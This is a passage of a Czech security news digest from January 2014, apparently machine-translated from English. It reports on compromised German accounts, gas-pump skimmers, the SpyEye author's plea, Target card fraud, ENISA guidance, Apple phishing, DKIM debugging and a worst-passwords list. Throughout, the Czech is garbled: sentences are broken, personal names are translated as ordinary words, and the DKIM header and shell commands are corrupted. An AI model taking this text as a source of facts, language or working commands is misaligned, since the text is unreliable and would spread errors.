zaměřuje na to, co je nejdůležitější - protivník - spíše než jen využije které vytvářejí. To je velký krok směrem k boji proti kybernetické bezpečnostní hrozby na nové bojiště -. Identifikací a obraně proti lidským nepřátelům, spíše než prostě snaží blokovat škodlivý kód " CrowdStrike předpovídá, že 2014 přinese zvýšené zaměření dodavatelů třetích stran, zneužívání nové generické domény Internetu top-level (gTLD), a zranitelná místa v systému Windows XP, které dosáhnou konce životnosti od společnosti Microsoft letos v dubnu. Zpráva předpovídá zvýšené využívání šifrování pomáhá chránit a poplést malware, větší využívání černých trhů pro nákup a prodej custom-made malware,. a zvýšené zaměření útoků kolem významných událostí, jako jsou olympijské hry, summitu G20 v roce 2014, a významných národních volbách v návaznosti na nedávné porušení hlavních prodejců, CrowdStrike tým také popisuje vývoj kybernetických zločinců, kteří se začínají rozvíjet schopnosti identifikovat a porušují konkrétní cíle ve snaze dat citlivých účtu.


16 milionů přihlášení ohrožena, varuje německý INFOSEC agenturu
31.1.2014 Hacking

Německý Spolkový úřad pro informační bezpečnost (BSI) vydala v úterý oznámení varování, že asi 16 milionů on-uživatelské účty byly ohrožena, a vyzvala uživatele k zda oni jsou mezi nimi.

Jedná se o údaje zřejmě objevili donucovacích orgánů po analýze botnety. Bohužel, BSI nesdílel další podrobnosti o vyšetřování. Oni řekl, že to není přesně jasné, jak a kdy se operátoři botnet se shromažďují tyto e-mailové adresy a hesla, ale že je také možné, že si koupil některé údaje z jiných zločinců. Vzhledem k tomu, e-maily jsou často používány jako výchozí uživatelská jména pro různé on-line účtů (e-mailových účtů, nakupování on-line, sociálních sítí, poskytovatelé internetových služeb), agentura nastavit webové stránky, kde mohou uživatelé zadat svou e-mailovou adresu a nechte jej zkontrolovat . podle seznamu napadených ty V případě, že byl, uživatelé jsou vyzýváni, aby pomocí AV řešení, kontrolovat jejich počítače malware, a pak okamžitě změnit všechny své on-line hesla -., a ne používat stejný jeden pro více účtů Důvodem, Proto agentura vydala toto varování je, že polovina z napadených účtů skončí . de , což znamená, že více než pravděpodobné, že patří k německým občanům. Podle místní , tento krádež digitálních identit byl objeven v prosinci 2013, ale agentura vzal svůj čas informovat potenciální oběti, protože potřebovali, aby to nastavit na výše uvedené webové stránky. I tak webové stránky byly původně havaroval počátečním lavina uživatelů. Zatím, někteří 880.000 + uživatelé, kteří používají místo zjistili, že byly ovlivněny.


Miliony ukradené přes Bluetooth-umožnil skimming zařízení
31.1.2014 Hardware | Bezpečnost
Třináct osoby byly obviněny Manhattan okresního prokurátora pro krádež obětí bankovních informací s skimming zařízení na čerpacích stanicích po celé jižních Spojených státech, a používat tyto informace k ukrást, a pak vyprat, více než 2.000.000 dolar za použití bankomatů a bank na Manhattanu.

Obžalovaní jsou také obviněn z praní špinavých ukradené peníze tím, že vklady a výběry hotovosti z ukradených výnosů dolů $ 10,000 ve více než 70 různých bankovních účtech. Čtyři vedení obžalované - Garegin Spartalyan, 40, Aram Martirosian, 34, Hayk Dzhandzhapanyan, 40, a Davit Kudugulyan, 42 - jsou účtovány v rámci 426-počítat obvinění z praní špinavých peněz, držení kradeného majetku, krádeže ve velkém měřítku, držení padělání zařízení a kovaných nástrojů na druhého stupně. Mezi další obžalovaní jsou každý obviněn z praní špinavých peněz. Podle dokumenty předložené u soudu, použité kreditní karty skimming zařízení kopírovat připíše danou částku na čtyři nejlepší obviněných a čísla ATM, stejně jako čísla kolíčkovými jednotlivci používané při čerpacích stanic Raceway a Racetrac celém Texasu, Gruzie a Jižní Karolína. se sbíráním zařízení byly vnitřně nainstalován, a proto nezjistitelné obětem, kteří zaplatili u čerpadel. Zařízení bylo také Bluetooth, takže žalovaní neměli fyzicky odstranit skimming zařízení za účelem získání ukradené osobní identifikační informace. Tyto špičkové obžalovaní pak údajně zakódováno, že odcizení informace na padělané karty. Přibližně od března 2012 do března 2013 se používají tyto padělané karty vybírat hotovost z bankomatů v Manhattanu, a poté uložen že ukradené peníze na bankovních účtech v New Yorku, které se stanovenými. Ostatní členové systému pak u bank v Kalifornii a Nevadě ihned stáhl ty peníze. Každý z transakcí obviněných bylo pod $ 10,000. Oni byli údajně strukturovány takovým způsobem, aby se zabránilo jakékoli požadavky na podávání zpráv o peněžních transakcí vyplývajících z právních předpisů a zamaskovat povahy, vlastnictví a řízení výnosů z trestné činnosti obžalovaných. Ze dne 26. března 2012 k 28 březnu 2013, obžalovaní jsou obviněni z praní špinavých přibližně 2.100.000 dolar.


Zkušební verze zdarma pro šifrování cloud-based a bezpečnou správu klíčů na AWS
31.1.2014 Šifrování
SafeNet oznámila třicet-denní zkušební verze zdarma své ProtectV virtuální řešení šifrování a virtuální KeySecure přes AWS Marketplace na Amazon Web Services (AWS). Finanční služby, organizace zdravotní péče, informační služby, podniky a high-tech podniky Nyní můžete spustit kompletní výrobní úrovni důkazy konceptu pro celý měsíc bez nákladů za použití cloudové šifrovací řešení SafeNet při zachování kontroly a dodržování předpisů. ProtectV a virtuální KeySecure jsou v současné době k dispozici na AWS Marketplace. ProtectV je šifrovací řešení pro virtuální instance a Virtual KeySecure je tvrzené Software Appliance, který spravuje a bezpečně uchovává šifrovací klíče pro ProtectV. šifrování SafeNet a správu klíčů řešení poskytovat zákazníkům s vysokou úrovní ochrany údajů k citlivým údajům, ať už v cloudu nebo na místě. Kombinace flexibility cloudu AWS a sílu šifrování nabídky SafeNet vytváří pohodlné řešení pro zákazníky optimalizaci úrovně bezpečnosti požadované pro i těch kritických zatížení. "Organizace si uvědomují, že šifrování a silné vedení klíč jsou nezbytné pro ilustraci kontrolu a dodržování pro vysokou hodnotu informací v cloudu, ale nemusí vědět, jak začít, "řekl David etue, viceprezident strategie firemní vývoj, SafeNet. "Díky bezplatné vyzkoušení SafeNet nabídky v AWS Marketplace, udělali jsme to jednoduché pro zákazníky, aby viděli, jak snadné je nasadit robustní rámec cloud šifrování." soud je za celých třicet dnů, kdy zákazníci podepsat-up mezi 09.01.2014 a 01.04.2014, a bude k dispozici na AWS Marketplace. Po třiceti-denní zkušební verzi, ProtectV a virtuální KeySecure mohou být převedeny na hodinové nebo měsíční cenový model na AWS Marketplace, podle toho, která volba je vybraná zákazník.


Většina zaměstnanců non-IT nemají "dostat" bezpečnostní politiky IT společnost
31.1.2014 Bezpečnost
DataMotion vydala výsledky svého druhého ročníku ankety o firemní e-mail a přenos souborů návyků. Jedním ze závěrů je dalekosáhlý komunikace rozpor mezi řízení IT a non-IT zaměstnanců na bezpečnostních a dodržování politiky. To zahrnuje takové kritické oblasti, jako je efektivní komunikace politik, jakož i využití volných spotřebitelských typu nástrojů pro přenos souborů a firemní e-mail na mobilních zařízeních. Kromě toho průzkum ukázal znepokojující procento v řízení IT vědomě riskovat shody, a dokonce i vypnutí základní schopnosti v důsledku technologické problémy. V době, kdy jsou velmi významné sankce jsou vybírané proti organizacím všech velikostí pro non-compliance a narušení dat, by vedení C-úrovni všímat. průzkumu dotázaných více než 400 IT a business s rozhodovací pravomocí napříč USA a Kanadou. . To zejména se zaměřením na ty, v odvětvích, která běžně zabývají citlivých údajů a shodu s regulatorními předpisy, jako jsou finanční služby, zdravotnictví a vlády Klíčové výhody patří: IT manažeři čelí komunikace odpojit

Celková vyprávění znamení odpojení je respondenty je míra důvěry měl ve schopnosti jejich společnosti předat audit shody: zaměstnanci non-IT jsou mnohem jistější (65,2% jsou "velmi" jisti), než ty, které v řízení IT (46,6%).
Oba IT a non-IT respondenti v drtivé většině uvedlo, že jejich firmy mají formální postup pro aktualizaci a komunikaci zabezpečení a dodržování zásad pro přenos souborů v elektronické podobě. Přesto, větší procento pracovníků non-IT (75,5%) oproti řízení IT (61,9%) se domnívá, zaměstnance / spolupracovníky plně pochopit těchto politik. Zatímco IT správa má matnější názor, pokud jde o porozumění, o průměru asi 1 na 3 z respondentů se domnívalo, zaměstnanci / spolupracovníky nejsou plně pochopit tyto zásady. To naznačuje, že vedení musí účinněji komunikovat politiky, a vytvořit větší povědomí o rizicích a spadu z porušení, zejména se zaměstnanci non-IT.
51,6% správy řekl zdarma spotřebitel služeb typu přenosu souborů jsou zakázány v jejich společnosti. Přesto pouze 24% pracovníků non-IT uvedlo, že tomu tak je.
E-mail šifrování a mobilní zařízení
Přestože 94,2% IT správa řekl mobilní zařízení pro firemní e-mailu jsou povoleny, pouze 62% pracovníků non-IT souhlasil - ale většina stále používat. To znamená nejen nedostatečné prosazování a komunikační politiky, naznačuje velké procento pracovníci mohou používat mobilní zařízení posílat citlivá data úmyslně nebo aniž by věděl, zda je to povoleno.
Mezi organizace s e-mailovými šifrovacích schopností, 44,4% stále chybí schopnost posílat a přijímat šifrované e-maily ze svého mobilního e-mailového klienta.
Celkově pouze 44% respondentů uvedlo, že jejich firma má politiku BYOD, i když 86,7% z týchž organizací povolit používání mobilních zařízení k e-mailu.
Zatímco 56,1% řízení IT uvedlo, že mají politiku BYOD místo, 74,9% zaměstnanců non-IT tvrdí, že buď nemají politiku nebo si nejste jisti, další jasně ukazuje, že politika nejsou účinně sdělovat.
Známky zlepšení, ale vážné riziko-brát přetrvává
71,7% respondentů uvedlo, že nyní mají e-mailové šifrovací funkce, což představuje nárůst o 6,2% více než 2012 výsledků průzkumu.
Důvěra v souladu se rozrostla i: 48.1% pocit "velmi" věří, jejich společnost by projít auditem shody, ve srovnání s 37,5% před rokem.
Z 80,9% respondentů, kteří uvedli, že jejich společnost má zabezpečení a dodržování zásad pro přenos souborů v elektronické podobě, 59% popsal výkon jako "velmi agresivní," zvýšení téměř o 12% v průběhu roku 2012.
I přes zlepšení, 79,5% respondentů se domnívá, zaměstnanci / spolupracovníky pravidelně nebo příležitostně porušovat bezpečnostní a dodržování zásad pro přenos souborů v elektronické podobě.
Když ptal se na jejich přístupu k plnění více než 1 do 5 v oblasti řízení IT (22,3%), řekl o své společnosti, "jsme riskovat, protože nemáme prostředky, aby bylo naprosto vyhovující."
Téměř 2 do 3 (62,6%), v řízení IT řekl filtrování politika, který se používá ke sledování obsahu odchozích e-mailu a soubor příloh pro účely shody, způsobuje problémy s falešným poplachům (zbytečně šifrované e-maily). Téměř čtvrtina (24,2%) připouští, že tak daleko, jak vypnout jejich filtrování na základě zásad.
"Je dobré vidět zlepšení v oblasti bezpečnosti a dodržování předpisů od poslední rok, ale vážné problémy zůstávají a nové se vyskytly," řekl DataMotion Chief Technology Officer, Bob Janáček. "Vždycky je tu poptávka po nových nástrojů, jako jsou e-mail na mobilních zařízeních -. Společnosti a pracovníci hledají lepší způsoby, jak získat práci úkolem je poskytovat šifrování a filtrování nástroje, které jsou snadné pro lidi, aby používali, a spolehlivý, takže don 't si zakázána. "IT musí držet krok, což je důvod, proč komunikace odpojte se zaměstnanci non-IT, stejně jako bytí přijata rizika, vyžadují okamžitou pozornost. Kromě toho, regulační vývoj v mnoha průmyslových odvětvích se rozšířila, což znamená, společnosti dosud vztahuje, může být nyní. Nedodržování může být zničující, "dodal Janáček." Tyto závěry průzkumu nám strukturovaný pochopení, že snad pomůže podnikům překonat a předvídat souvisejících otázek, zejména v době, kdy bezpečnost a dodržování předpisů může tak dramaticky ovlivnit spodním řádku.


Ruský tvůrce "SpyEye" malware přiznává, že bankovní podvody
30.1.2014 Viry

FBI oznámila zatčení a obvinění z Alexsandr Panin, 24, ruský hacker, který vyvinul SpyEye trojský kůň, a používal to, aby ukrást finanční informace a peníze z celého světa.

V prohlášení ministerstva spravedlnosti , Ricky Maxwell, úřadující zvláštní agent v poplatku, řekl, že: "zadržení pana Panin znamená, že jeden z nejlepších světových vývojářů škodlivého softwaru je již v pozici, vytvářet počítačové programy, které mohou postihovat lidi po celém světě. "

"Botnety, jako SpyEye představuje jednu z nejnebezpečnějších typů škodlivého softwaru na internetu dnes, které lze ukrást identitu a peníze lidí ze svých bankovních účtů bez jejich vědomí."

Panin vytvořil SpyEye v roce 2009. To je myšlenka k infikovaných více než 1,4 milionu počítačů ve svém životě, vytváří masivní botnet k pronájmu. Včera se přiznal k spiknutí s cílem spáchat drát a bankovní podvody u soudu v severní obvod Gruzie.

"Vzhledem k tomu, že nedávné odhalení masivní krádeže finančních informací z velkých maloobchodních prodejen po celé zemi, Američané nepotřebují třeba připomenout, jak zničující je, když počítačoví zločinci tajně nainstalovat škodlivý kód na počítačových sítích a sifon mimo osobní informace od nic netušících spotřebitelů, "řekl úřadující náměstek generálního prokurátora Mythili Raman.

Registrovat se uvádí, že Panin prodává vlastní verze SpyEye o tajuplných fóra pro od 1000 dolarů a 8500 dolarů. On je myšlenka k prodal SpyEye nejméně 150 lidí, z nichž jeden, s použitím "Soldier" alias používá malware ukrást $ 3,2 metrů.

Více než 10.000 bankovní účty po celém světě jsou myšlenka k byli hacknutý SpyEye. Panin zatčení vedl čtyři další zatýkání - ve Velké Británii a Bulharsku - lidí je známo, že se používají malware.

SpyEye byl použit jeden východní Evropy elipsoidnímu gang ukrást přibližně 70 m $ ze společnosti, církví a státních organizací v USA a Evropě, v závislosti na Yahoo .

Panin byl nejprve zkoumán v roce 2011, kdy agenti FBI zabavila SpyEye serveru v Gruzii. Pozdnější ten rok, agenti komunikovali s Panin - pod jeho jinak 'Gribodemon "a" Harderman "- včetně verze softwaru.

Byl zatčen v červenci 2013 okamžitě vydán do Atlanty, Gruzie. Panin byl na dovolené, na návštěvě kamaráda v Dominikánské republice, v závislosti na Rusku dnes .

Mluvčí ruského ministerstva zahraničí odsoudil zatčení: "Samozřejmě, že jsme vážně znepokojeni skutečností, že opět týká zatčení ruského občana s americkým rozkazu ve třetí zemi. Myslíme si, že skutečnost, že tyto praktiky se stává začarovaný tendence je naprosto nepřijatelné a nepřípustné, " říká ruské ministerstvo zahraničí informace a tiskové oddělení náměstek ředitele Maria Zacharová.


Společnosti musí zlepšit plány reakce na incidenty
30.1.2014 Incidenty

Bezpečnostní hrozby jsou na spadnutí, ale ředitelé a další členové řídícího týmu jsou v nevědomosti o možných kybernetických útoků proti jejich společností, říkají, že výsledky zprávy Ponemon Institute s názvem "Cyber ​​Security Incident Response: Jsme připraveni, jak si myslíme, že ? "

Výzkum také ukazuje, že v důsledku, Computer Security Incident Response týmy (CSIRT), často chybí prostředky nezbytné pro odrazit trvalý nápor pokročilých hrozeb, kterým čelí dnešní organizace. pověřen Lancope, výzkum Ponemon Institut zkoumal 674 IT a bezpečnost IT . odborníci ve Spojených státech a ve Spojeném království, kteří jsou zapojeni do CSIRT činnosti jejich organizace studie shrnuje klíčové doporučení pro organizace, které chtějí zlepšit svůj proces reakce na incidenty: Bezpečnostní incidenty jsou na spadnutí - Šedesát osm procent respondentů uvedlo, že jejich organizace se zkušenostmi narušení bezpečnosti nebo mimořádné události v uplynulých 24 měsících. Čtyřicet šest procent říká, jiný incident je na spadnutí a může stát během příštích šesti měsíců. Řízení je velmi nevědomý kybernetických bezpečnostních hrozeb - Osmdesát procent respondentů uvedlo, že nemají často komunikovat s výkonným řízením o možných kybernetických útoků proti jejich organizaci . Organizace není měření účinnosti jejich úsilí reakce na incidenty - Padesát procent respondentů nemají významné provozní metriky pro měření celkové účinnosti reakce na incidenty. Porušení zůstávají nevyřešeny po celý měsíc - Zatímco většina organizací uvedlo, že by se mohlo zjistit bezpečnostní incident, během několika hodin, trvá celý měsíc v průměru pracovat prostřednictvím procesu vyšetřování incidentu, obnovení služby a ověřování. CSIRT chybí odpovídající investice - Polovina všech respondentů tvrdí, že méně než 10 procent z jejich bezpečnostních rozpočtů se používají pro incidentu . činností reakce, a většina tvrdí, že jejich rozpočty reakce na incidenty byly v uplynulých 24 měsíců nezvýšila auditní stopa sítě jsou nejúčinnější nástroj pro reakce na incidenty - Osmdesát procent respondentů tvrdí, že analýza kontrolních záznamů ze zdrojů, jako jsou NetFlow a paket zachytí je nejúčinnějším přístupem k detekci bezpečnostních incidentů a narušení. Tento výběr byl více populární než detekce narušení systémů a anti-virus software. "Je-li 2013 je nějaký náznak, dnešní podniky jsou špatně vybaveny identifikovat a zastavit sofistikované útoky zahájily národní státy, se zlými úmysly outsidery a určené zasvěcenci," řekl Mike Potts , prezident a generální ředitel společnosti Lancope. "Nyní je čas pro manažery C-úrovni a s rozhodovací pravomocí v oblasti IT, aby se spojily a rozvíjet silnější, více komplexní plány reakce na incidenty. Tato komunikace je rozhodující, pokud chceme snížit ohromující frekvence vysokou -profil narušení bezpečnosti osobních údajů a škodlivé firemní ztráty, které vidíme v médiích na téměř každodenně.


Údaje karty ukradené v cílové porušení začíná stále zneužívána
30.1.2014 Incidenty

Informace Platba kartou udeřil v masivní Target porušení byl spatřen zneužívány v Texasu, a dva mexičtí občané byli zatčeni a čelí federální obvinění. Podle AP zpráva, Mary Carmen Vaquera Garcia, 27, a Daniel Guardiola Dominguez, 28, z Monterrey, Mexiko, opakovaně vstoupil do USA a používá karty klonované z informací ukradené cíl provést velké množství nákupů v jižním Texasu. dva by se provádět ve svých podvodných invaze v neděli, snad v naději, že společnosti vydávající kreditní karty a maloobchodníci by nebyl schopen na místě krádeže v čase a které by jim umožnilo vrátit se do Mexika, aniž by se chytil. Karty, které byly použité klonované z ukradených informací vázána na South Texas obyvatel, aby platby méně podezřelé. Zdá se, První vpád byl proveden 12. ledna, a cílené Best Buy, Wal-Mart a hračky R Us obchodů v této oblasti. Poté, co byl objeven podvodné povahy transakcí, policie a tajné služby Spojených států byly přineseny do vyšetřit. Poté, co sledoval hodiny videokazet, které identifikoval vaquera Garcia a Guardiola Domingues, stejně jako auto, které používá. Příští neděli, když se snažili znovu vstoupit do USA se stejným vozem, úřady všiml a zastavil je. Měli 96 klonovaných karet s nimi v době zatčení. Dva podvodníci se zřejmě podílí jak na pořízení odcizených dat a fyzické vytváření klonovaných karet, ale podle McAllen policejní šéf Victor Rodriguez, mohli také být součástí většího spiknutí, a jsou propojeny do východní Evropy nebo Ruska podvodníci, kteří se "zřejmě prodávají datové sady podle krajů."


Finanční sektor potřebuje nereplikovatelného, ​​pověření jedno použití
30.1.2014 Bezpečnost

Různé žetony, přístroje, mobilní telefony, elektronické podpisy, atd. jsou používány k ověření své e-identity. Přesto, některé finanční instituce jsou stále ještě nejsou s ohledem na riziko nedostatečné mechanismy ověřování podle nové studie agentury ENISA EU. Zpráva analyzuje současný e-Finance podvodů a koreluje s prověřujícími mechanismy finančních institucí "zákazníků", zdůrazňuje potřebu pro aktualizována bezpečnostní mechanismy, a poskytuje 10 doporučené postupy pro lepší zabezpečení. Agentura analyzovala více než 100 Průzkum odpovědi od obchodníků a e-bankovnictví odborníků na bezpečnost v elektronické identity a ověření metody (eIDA). Jedná se o občany, zákazníky a firmy používají v e-Finance a e-Platební systémy na denní bázi. Navíc agentura identifikovala rizika a vzory útoku pro každý mechanismus autentizace, včetně phishingových (cílené útoky), ID-krádež, . relace a identity hi-zvedání, atd., finančních institucí, obchodníků a poskytovatelů platebních služeb Jako výsledek, agentura vypracovala pokyny, osvědčené postupy a doporučení pro e-bankovnictví a internetové platby: 1. Zlepšit bezpečnost e-Finance prostředí , což znamená, že účastník finančních operací musí:

Proveďte analýzu rizik na základě profilu a velikosti instituce zákazníků,
Zlepšit informovanost a znalosti zákazníků,
Metody ověřování Tailor do profilů chování zákazníka a transakcí parametrů (např. země určení, množství.)
Dříve detekce zařízení kompromisu zákazníků, přes registraci zařízení, testování a hodnocení jeho bezpečnosti. ("Předpokládejme, že všechna zařízení jsou nakaženi").
2. Zlepšit bezpečnost e-Finance aplikací a jejich distribučních kanálů k zákazníkům : podpora tradiční "bezpečnosti již od návrhu". Měli byste také vzít v úvahu návrh nové směrnice o ochraně osobních údajů, a používat důvěryhodné kanály pro instalaci aplikací v přístroji zákazníků. 3. Podporovat proporcionalitu mezi Zvolená metoda (y), robustnost a identifikovat rizika (přiměřenosti eIDA do kontextu transakce), s důrazem na využití "2-faktoru ověřování" i pro nízké riziko operace (např. ATM má toto: karta a PIN kód). 4. Zlepšit znalosti a chování zákazníků i odborníků. Abychom to shrnuli, dnešní aktuální eIDA praxe ve finančním sektoru nepokrývají mnoho rizik. ECB a Evropská komise vyvíjí doporučení a předpisy, které budou odpovídat zprávě ENISA identifikovat a vytvářet nástroje, které snižují finanční ztráty v důsledku podvodů. "Finanční sektor spravuje e-transakce v řádu stovek miliard eur ročně. Proto, bezpečný e-identity a ověřování je prostě nutností pro ekonomiku Evropy, "komentoval ENISA výkonný ředitel profesor Udo Helmbrecht." Finanční instituce by měly používat zabezpečení jako konkurenční marketingový nástroj. Díky této zprávě, mohou účastníci finančních operací provést analýzu nákladů / přínosů dodatečných mechanismů autentizace.


Cybersecurity předpovědi na rok 2014
30.1.2014 Bezpečnost

Nástup nových technologií, bude rozšířená implementace mobilní a bezdrátové komunikace a zvýšení mobilním přijetí otevírají nové příležitosti pro fotoaparáty Cyber-zločinci. se v roce 2014 nyní v plném proudu, Catalin Cosoi, Chief Security stratég BitDefender, čerpá z jeho odbornosti předpovědět klíčové bezpečnostní hrozby na obzoru: Digitální důvěra je pryč: Malware podepsal s ukradenými digitálních certifikátů byl asi na chvíli, ale loňská "příští velká věc" byla malware podepsal s digitálními certifikáty výslovně zakoupených pro tento účel. Očekáváme, že tento trend bude pokračovat po 2014, a to zejména pro šedé oblasti softwaru, jako je agresivní adware nebo spyware. "internet věcí" na rozšíření: Do roku 2015 bude počet propojených zařízení ve světě dosáhnout 25 miliard, a to číslo bude do roku 2020 zdvojnásobit. Mezi tato zařízení patří: monitory zvířat; lékařské přístroje a zařízení; automobilových palubních počítačů a nouzové signalizaci, bóje a předměty pro domácnost, z nichž každý má své vlastní bezpečnosti implementací. "Internet of Things" je pravděpodobné, aby se stal hlavním cílem kybernetických zločinců kvůli pouhému počtu zařízení a špatné implementace zabezpečení. Cyber-zločinci se zaměřují Android uživatele: Android v současné době má asi 70 procent podílu na trhu mobilních OS , což je neuvěřitelně důležité, aby kybernetických zločinců. Přidání k tomu je skutečnost, že mobilní zařízení jsou platební mechanismus sami (prostřednictvím prémiových SMS, stejně jako nově zavedené platby NFC), bude počítačoví zločinci zvýšit své zaměření na rozvoj malware pro Android. Vznik BYOD také umožní počítačoví zločinci cílovým společnostem, jakož i domácí uživatele. E-mail spam je klesající, ať žije sociální sítě cílenou reklamu: Spam byl asi od úsvitu elektronických komunikací a získal vážné trakci při botnet éra. Zatímco objemy spam bude i nadále čerpat v roce 2014, bude počítačoví zločinci dát větší důraz na sociálních sítích, kde mohou efektivněji zaměřit oběti. se Facebook již překonal jednu miliardu aktivních uživatelů sociální sítě budou také využívány kybernetických zločinců se sklizeň ochotně sdílené informace pro kopí-phishing a pro šíření nových hrozeb. Slepé spam útoky, samozřejmě, být stále používány počítačovými zločinci v souvislosti s nebezpečnými přílohami, jak přidat počítače do botnetů. Staré technologie bude stále populární: ukončení Blížící se podpora pro Windows XP - že dosáhne konce své životnosti v dubnu 2014 - bude pravděpodobně nechal počítačoví zločinci jít po uživatele operačního systému, který již není oprava. Bez aktualizace zabezpečení, které mají být dodány, budou uživatelé Windows XP, a to zejména těch, v podnikových prostředích, stále zranitelnější po dubnu 2014. nošení Technologie může být terčem hackerů: nositelná zařízení, jako je například zdravotnictví, sledování náramky, jsou stále více populární s uživateli po celém světě a jsou také stále více propojeny s internetem. Jejich minimální velikost a zaměření na životnost baterie ponechává jen málo, aby žádný prostor pro zabezpečení, které mohou dát je do křížové palby hackerů přestřelce v blízké budoucnosti, i když ne nutně . roce 2014 Lékařské přístroje může být také v ohrožení: Stejně jako nositelné technologie, zdravotnické prostředky jsou stále více a více propojené. Jejich bezdrátové komunikační schopnosti umožňují lékařům sledovat zdravotní stav pacienta a výkonu zařízení, ale může také umožnit neoprávněným třetím stranám manipulovat s vybavením a způsobit okamžitou smrt. Malware roste větší a zákeřnější: Botnety jsou stále páteří každého Cyber-kriminální operace, od DDoS útoky na rozesílání spamu nebo nelegálně těžby Bitcoins na úkor oběti. Cyber-zločinci se zaměří na využití neopravených chyby v softwaru se připojit stroje na botnetů. Některé z větších botnetů bude pravděpodobně přepnout do peer-to-peer komunikační modely, aby se zabránilo takedown, zatímco ty menší budou používat sociální sítě jako záložní mechanismus pro komunikaci s jejich C & C servery. Malware překoná 250 milionů unikátních vzorků v průběhu 2014, protože na straně serveru polymorfismus funkcí, které jsou přítomny v téměř všech hlavních crimepacks na podzemní trhu.


Uživatelé Apple hit s "pomocí aktualizace nových SSL servery" phishing e-mail
30.1.2014 Šifrování

Uživatelé s Apple účtů jsou opět terčem s legitimními vypadající phishingových e-mailů, které jsou po jejich pověření účtu, osobní a finanční informace. "Váš on-line přístup byl zablokován," říká falešný e-mail vybaveny logem Apple a barevné schéma. "Jak součástí naší trvalé snahy poskytnout "nejlepší možný" služby a ochranu pro všechny naše zákazníky, jsme se vyžaduje, aby každý zákazník aktualizovat svůj účet (y) s použitím nových SSL servery, aby se zabránilo přerušení vámi on-line přístupu. Aktualizujte prosím svůj online účet (y) kliknutím prvku pod aktualizaci účtu. " nabídl odkaz se oběti na falešné Apple přihlašovací stránku, kde jsou vyzváni k zadání své Apple ID a heslo. Po "přihlášení", jsou vyzýváni, aby zadali své celé jméno, adresu, telefonní číslo, porodní údaje, rodné příjmení matky, jméno na platební karty, číslo karty, datum ukončení platnosti a bezpečnostní kód (klikněte na screenshotu pro zvětšení) : Jakmile tohle všechno info je předložen, oběti jsou přesměrovány na legitimní webové stránky Apple. Netřeba dodávat, že zadané informace končí v rukou kybernetických podvodníků, kteří jej budou používat k provedení krádeží identity, podvody karty, a unést obětí "Apple účet, aby bylo možné ji zneužít pro spam a jiné hanebné činnosti, varuje Hoax-Slayer .


Jak Ladění DKIM
30.1.2014 Spam

DKIM je jeden způsob, jak usnadnit ostatní servery zjistit, zda e-maily odeslané jménem vaší domény je falešné. Váš e-mail server přidat digitální podpis do každého e-mailu ověření zdroje. To není tak dobrý podpisu celý e-mail, ale je to užitečný nástroj, přinejmenším ověřit doménu použít jako součást záhlaví "From".

Problém je v tom, že DKIM může být obtížné ladit. Pokud jste mailová zamítnuta, je užitečné mít možnost ručně ověřit, co se stalo. Například, můžete mít různé klíče, a špatný klíč byl použit, což je jeden z záludnějších otázek k ladění.

Začněme se základy: nejprve se ujistěte, e-mail odešlete je skutečně podepsal. Podívejte se na "DKIM-Signature" záhlaví:

DKIM-Signature: v = 1; = rsa-sha256, c = uvolněný / jednoduchý, d = dshield.org;
s = default, t = 1391023518;
bh = wu4x1KKZCyCgkXxuZDq + 7322 im11hlsCET + KxQ9 +48 =;
h = Komu: Předmět: Datum: Z;
b = wVZQsIvZQe0i2YuhFNeUrpfet0wa7cIcwZ8LR9izWuF1E1NDQmpKUImCHO/RlPgYJ
wruW1IunQWRXtd4MQMuUZNsU1rGFzsYXoC4T6rVjHonQtQgoFSoEfo90KtZTC2riev
Existuje několik důležitých částí, které hledají:

d = dshield.org - to je doména, pro kterou podpis je dobré pro
s = default - to může být použita k definování různých klíčů.
Pomocí těchto dvou hodnot, můžeme zpřístupnit veřejné klíče od DNS:

$ Dig + krátký TXT default._domainkey.dshield.org
"V = DKIM1 \, k = rsa \, p = MIGfMA0G ... AQAB"

V tuto chvíli víme, který byl klíč používaný k podepisování záhlaví, a máme veřejný klíč pro ověření. Pravděpodobně jste již všiml algoritmus použitý k podepsání záhlaví: "= RSA-SHA256".

DKIM podepisuje pouze určité záhlaví. V našem případě jsme podepsali Komu, Předmět, Datum a od hlavičky, které lze vzít z "h = ..." pole výše.

U vzorku, e-mailu výše, jsou tyto hlavičky:

Pro: jullrich@euclidian.com
Předmět: Testování DKIM
Datum: St. 29.leden 2014 19:25:18 +0000 (UTC)
Od: jullrich@dshield.org (Johannes Ullrich)

Naštěstí jsme nemuseli dělat všechno ověření "od ruky". Místo toho můžeme použít "opendkim-testmsg" nástroj. Jsme JST projít syrové e-mailovou zprávu na něj.
Tento nástroj je velmi jednoduchý, v tom, že neposkytuje žádný výstup, pokud je ověření úspěšné. Nástroj bude automaticky načítat klíč.

Například:

$ Opendkim-testmsg <TestingDKIM.eml
$

Na selhání, budete mít obecný chybu:

$ Opendkim-testmsg <TestingDKIM.eml
opendkim-testmsg: dkim_eom (): Špatný podpis

Pokud tak učiníte implementovat DKIM, vřele doporučuji také nakonfigurovat adresy podávání zpráv prostřednictvím DMARC. Tímto způsobem, některé větší ISP vám poslat zprávu, pokud ověření DKIM selže.


"123456" sesadí "heslo" z vrcholu nejhorším seznamu hesel
28.1.2013 Šifrování

SplashData oznámila svou výroční seznam 25 nejčastějších hesel nalezených na internetu, a poprvé od té doby se společnost začala sestavování její roční přehled, "heslo" ztratil jeho titul jako nejčastější, a proto Nejhorší Password, a dva- Doba runner-up "123456" se pochybnou čest.

Letošní seznam byl ovlivněn velkým počtem hesla od uživatelů Adobe vyslaných on-line o bezpečnostní poradenské firmy striktury Consulting Group po dobře uveřejněný narušení bezpečnosti společnosti Adobe. "Vidět hesla jako" adobe123 "a" Photoshop "na tomto seznamu, nabízí dobré připomenutí není na založit heslo na název webové stránky nebo aplikace, kterou přistupuje, "říká Morgan Zabitý, generální ředitel společnosti SplashData. "Dalším zajímavým aspektem letošního seznamu je, že více krátké číselné heslo ukázal, i když webové stránky se začínají prosazovat silnější hesel , "řekl Zabitý. Například na letošním seznamu nové jsou jednoduché a snadno guessable hesla jako "1234" na # 16, "12345", u # 20, a "000000" na # 25. SplashData je "Nejhorší Hesla 2013" jsou: 1) 123456 ( Až 1 z roku 2012) 2) Heslo (Down 1) 3) 12345678 (nezměněno) 4) qwerty (až 1) 5) abc123 (Down 1) 6) 123456789 (nové) 7.) 111111 (až 2) 8) 1234567 ( Až 5) 9) iloveyou (Up 2) 10) adobe123 (New) 11) 123123 (až 5), 12) admin (New) 13) 1234567890 (New) 14) letmein (Down 7) 15. photoshop (nový) 16) 1234 (New) 17) opice (Down 11) 18), stín (beze změn) 19) Sunshine (Down 5) 